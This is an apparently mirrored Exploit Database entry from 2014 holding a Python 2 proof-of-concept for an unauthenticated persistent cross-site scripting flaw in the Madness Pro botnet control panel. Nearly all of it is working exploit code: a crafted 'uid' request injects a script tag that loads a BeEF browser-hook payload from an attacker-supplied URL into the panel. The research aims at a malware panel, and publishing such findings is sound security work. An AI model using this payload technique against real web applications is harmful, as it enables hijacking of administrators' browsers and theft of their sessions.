Madness Pro 1.14 – Persistent Cross-Site Scripting

• Exploit Database
• 10 阅读

• 作者： bwall
  日期： 2014-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33654/

• #!/usr/bin/env python2
  # -*- coding: utf-8 -*-
  # Exploit Title: Madness Pro <= 1.14 Persistent XSS
  # Date: June 05, 2014
  # Exploit Author: @botnet_hunter
  # Version: 1.14
  # Tested on: Apache2 - Ubuntu - MySQL
  #▄▄▌▄▄▄▄· ▄▄▄▄▄• ▌ ▄ ·.▄· ▄▌
  #██•▪ ▐█ ▀█▪▪ •██▪ ·██ ▐███▪▐█▪██▌
  #██▪ ▄█▀▄ ▐█▀▀█▄ ▄█▀▄▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪
  #▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·.
  #.▀▀▀▀█▄▀▪·▀▀▀▀▀█▄▀▪ ▀▀▀▀█▄▀▪▀▀█▪▀▀▀▀ •
  # ▄▄· ▄• ▄▌▄▄▄▪ ▐ ▄▄▄ • • ▌ ▄ ·.▄▄▄· ·▄▄▄▄ ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ ·
  #▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀.
  #██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
  #▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐███ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
  #·▀▀▀▀▀▀ .▀▀▀▀▀▀▀ █▪·▀▀▀▀ ▀▀█▪▀▀▀ ▀▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀▀▀▀▀▀▀▀▀
  #
  # Unauthenticated persistent XSS in Madness Pro panel <= 1.14
  # Discovered and developed by bwall @botnet_hunter
  #
  # References:
  #	http://blog.cylance.com/a-study-in-bots-lobotomy
  #	
  import urllib
  
  # Fill in URL that Madness Pro bot connects back to
  panel_url = ""
  # Fill in URL to your Javascript payload (the shorter the better)
  beef_hook = ""
  
  
  def install_beef_hook(beef_hook_url, panel_index_url):
  f = urllib.urlopen("{0}?uid=12345%3Cimg%20alt%3D\\')%3B%5C%22%3E%3Cscript%20src=\"{1}\">%3C%2Fscript%3E%3C%2Fa%3E"
   "%3Ca%20href%3D%22%23%22%20onclick%3D%5C%22set_status(\\'12345".format(panel_index_url,
  beef_hook_url))
  print f.read()
  
  install_beef_hook(beef_hook, panel_url)